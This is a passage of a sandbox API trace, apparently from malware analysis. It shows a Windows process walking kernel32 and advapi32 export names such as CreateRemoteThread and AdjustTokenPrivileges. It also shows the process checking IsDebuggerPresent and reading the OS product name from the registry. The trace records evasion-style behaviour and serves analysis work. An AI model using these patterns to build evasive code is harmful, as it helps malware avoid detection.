(lpString="CREATEPROCESSASUSERW") returned 20 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0158.328] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0158.328] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0158.328] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0158.329] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0158.329] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0158.329] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0158.329] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0158.329] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0158.329] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0158.329] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0158.329] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0158.329] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0158.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0158.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0158.329] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0158.329] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0158.329] lstrlenA (lpString="CREATETHREAD") returned 12 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0158.329] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0158.329] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0158.329] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0158.330] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0158.330] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0158.330] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0158.330] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0158.330] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0158.330] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0158.330] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0158.330] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0158.330] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0158.330] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0158.330] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0158.330] lstrlenA (lpString="CTRLROUTINE") returned 11 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0158.330] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0158.330] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0158.330] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0158.330] lstrlenA (lpString="DEBUGBREAK") returned 10 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0158.330] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0158.330] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0158.330] lstrlenA (lpString="DECODEPOINTER") returned 13 [0158.330] lstrcpyA (in: lpString1=0x239e320, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0158.331] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0158.331] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0158.331] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0158.331] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0158.331] lstrlenA (lpString="DELETEATOM") returned 10 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0158.331] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0158.331] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0158.331] lstrlenA (lpString="DELETEFIBER") returned 11 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0158.331] lstrlenA (lpString="DELETEFILEA") returned 11 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0158.331] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0158.331] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0158.331] lstrlenA (lpString="DELETEFILEW") returned 11 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0158.331] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0158.331] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0158.331] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0158.331] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0158.331] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0158.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0158.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0158.332] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0158.332] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0158.332] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0158.332] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0158.332] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0158.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0158.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0158.332] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0158.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0158.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0158.332] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0158.332] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0158.332] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0158.332] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0158.332] lstrcpyA (in: lpString1=0x239e320, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0158.332] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0158.333] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0158.333] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0158.333] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0158.333] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0158.333] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0158.333] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0158.333] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0158.333] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0158.333] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0158.333] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0158.333] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0158.333] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0158.333] lstrcpyA (in: lpString1=0x239e320, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0158.334] IsDebuggerPresent () returned 0 [0158.335] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x239efe4 | out: phkResult=0x239efe4*=0xe0) returned 0x0 [0158.335] RegQueryValueExW (in: hKey=0xe0, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x190000, lpcbData=0x239efe8*=0x400 | out: lpType=0x0, lpData=0x190000*=0x57, lpcbData=0x239efe8*=0x2e) returned 0x0 [0158.335] RegCloseKey (hKey=0xe0) returned 0x0 [0158.335] GetCurrentProcess () returned 0xffffffff [0158.335] lstrlenA (lpString="advapi32.dll") returned 12 [0158.335] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x77010000 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="A_SHAFinal" | out: lpString1="A_SHAFinal") returned="A_SHAFinal" [0158.335] lstrlenA (lpString="A_SHAFINAL") returned 10 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="A_SHAInit" | out: lpString1="A_SHAInit") returned="A_SHAInit" [0158.335] lstrlenA (lpString="A_SHAINIT") returned 9 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="A_SHAUpdate" | out: lpString1="A_SHAUpdate") returned="A_SHAUpdate" [0158.335] lstrlenA (lpString="A_SHAUPDATE") returned 11 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="AbortSystemShutdownA" | out: lpString1="AbortSystemShutdownA") returned="AbortSystemShutdownA" [0158.335] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNA") returned 20 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="AbortSystemShutdownW" | out: lpString1="AbortSystemShutdownW") returned="AbortSystemShutdownW" [0158.335] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNW") returned 20 [0158.335] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheck" | out: lpString1="AccessCheck") returned="AccessCheck" [0158.336] lstrlenA (lpString="ACCESSCHECK") returned 11 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckAndAuditAlarmA" | out: lpString1="AccessCheckAndAuditAlarmA") returned="AccessCheckAndAuditAlarmA" [0158.336] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMA") returned 25 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckAndAuditAlarmW" | out: lpString1="AccessCheckAndAuditAlarmW") returned="AccessCheckAndAuditAlarmW" [0158.336] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMW") returned 25 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByType" | out: lpString1="AccessCheckByType") returned="AccessCheckByType" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPE") returned 17 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeAndAuditAlarmA" | out: lpString1="AccessCheckByTypeAndAuditAlarmA") returned="AccessCheckByTypeAndAuditAlarmA" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMA") returned 31 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeAndAuditAlarmW" | out: lpString1="AccessCheckByTypeAndAuditAlarmW") returned="AccessCheckByTypeAndAuditAlarmW" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMW") returned 31 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeResultList" | out: lpString1="AccessCheckByTypeResultList") returned="AccessCheckByTypeResultList" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLIST") returned 27 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeResultListAndAuditAlarmA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmA") returned="AccessCheckByTypeResultListAndAuditAlarmA" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMA") returned 41 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleA" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEA") returned 49 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleW" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEW") returned 49 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AccessCheckByTypeResultListAndAuditAlarmW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmW") returned="AccessCheckByTypeResultListAndAuditAlarmW" [0158.336] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMW") returned 41 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessAllowedAce" | out: lpString1="AddAccessAllowedAce") returned="AddAccessAllowedAce" [0158.336] lstrlenA (lpString="ADDACCESSALLOWEDACE") returned 19 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessAllowedAceEx" | out: lpString1="AddAccessAllowedAceEx") returned="AddAccessAllowedAceEx" [0158.336] lstrlenA (lpString="ADDACCESSALLOWEDACEEX") returned 21 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessAllowedObjectAce" | out: lpString1="AddAccessAllowedObjectAce") returned="AddAccessAllowedObjectAce" [0158.336] lstrlenA (lpString="ADDACCESSALLOWEDOBJECTACE") returned 25 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessDeniedAce" | out: lpString1="AddAccessDeniedAce") returned="AddAccessDeniedAce" [0158.336] lstrlenA (lpString="ADDACCESSDENIEDACE") returned 18 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessDeniedAceEx" | out: lpString1="AddAccessDeniedAceEx") returned="AddAccessDeniedAceEx" [0158.336] lstrlenA (lpString="ADDACCESSDENIEDACEEX") returned 20 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAccessDeniedObjectAce" | out: lpString1="AddAccessDeniedObjectAce") returned="AddAccessDeniedObjectAce" [0158.336] lstrlenA (lpString="ADDACCESSDENIEDOBJECTACE") returned 24 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAce" | out: lpString1="AddAce") returned="AddAce" [0158.336] lstrlenA (lpString="ADDACE") returned 6 [0158.336] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAuditAccessAce" | out: lpString1="AddAuditAccessAce") returned="AddAuditAccessAce" [0158.336] lstrlenA (lpString="ADDAUDITACCESSACE") returned 17 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAuditAccessAceEx" | out: lpString1="AddAuditAccessAceEx") returned="AddAuditAccessAceEx" [0158.337] lstrlenA (lpString="ADDAUDITACCESSACEEX") returned 19 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddAuditAccessObjectAce" | out: lpString1="AddAuditAccessObjectAce") returned="AddAuditAccessObjectAce" [0158.337] lstrlenA (lpString="ADDAUDITACCESSOBJECTACE") returned 23 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddConditionalAce" | out: lpString1="AddConditionalAce") returned="AddConditionalAce" [0158.337] lstrlenA (lpString="ADDCONDITIONALACE") returned 17 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddMandatoryAce" | out: lpString1="AddMandatoryAce") returned="AddMandatoryAce" [0158.337] lstrlenA (lpString="ADDMANDATORYACE") returned 15 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddUsersToEncryptedFile" | out: lpString1="AddUsersToEncryptedFile") returned="AddUsersToEncryptedFile" [0158.337] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILE") returned 23 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AddUsersToEncryptedFileEx" | out: lpString1="AddUsersToEncryptedFileEx") returned="AddUsersToEncryptedFileEx" [0158.337] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILEEX") returned 25 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AdjustTokenGroups" | out: lpString1="AdjustTokenGroups") returned="AdjustTokenGroups" [0158.337] lstrlenA (lpString="ADJUSTTOKENGROUPS") returned 17 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AdjustTokenPrivileges" | out: lpString1="AdjustTokenPrivileges") returned="AdjustTokenPrivileges" [0158.337] lstrlenA (lpString="ADJUSTTOKENPRIVILEGES") returned 21 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AllocateAndInitializeSid" | out: lpString1="AllocateAndInitializeSid") returned="AllocateAndInitializeSid" [0158.337] lstrlenA (lpString="ALLOCATEANDINITIALIZESID") returned 24 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AllocateLocallyUniqueId" | out: lpString1="AllocateLocallyUniqueId") returned="AllocateLocallyUniqueId" [0158.337] lstrlenA (lpString="ALLOCATELOCALLYUNIQUEID") returned 23 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AreAllAccessesGranted" | out: lpString1="AreAllAccessesGranted") returned="AreAllAccessesGranted" [0158.337] lstrlenA (lpString="AREALLACCESSESGRANTED") returned 21 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AreAnyAccessesGranted" | out: lpString1="AreAnyAccessesGranted") returned="AreAnyAccessesGranted" [0158.337] lstrlenA (lpString="AREANYACCESSESGRANTED") returned 21 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditComputeEffectivePolicyBySid" | out: lpString1="AuditComputeEffectivePolicyBySid") returned="AuditComputeEffectivePolicyBySid" [0158.337] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYSID") returned 32 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditComputeEffectivePolicyByToken" | out: lpString1="AuditComputeEffectivePolicyByToken") returned="AuditComputeEffectivePolicyByToken" [0158.337] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYTOKEN") returned 34 [0158.337] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditEnumerateCategories" | out: lpString1="AuditEnumerateCategories") returned="AuditEnumerateCategories" [0158.338] lstrlenA (lpString="AUDITENUMERATECATEGORIES") returned 24 [0158.338] lstrcpyA (in: 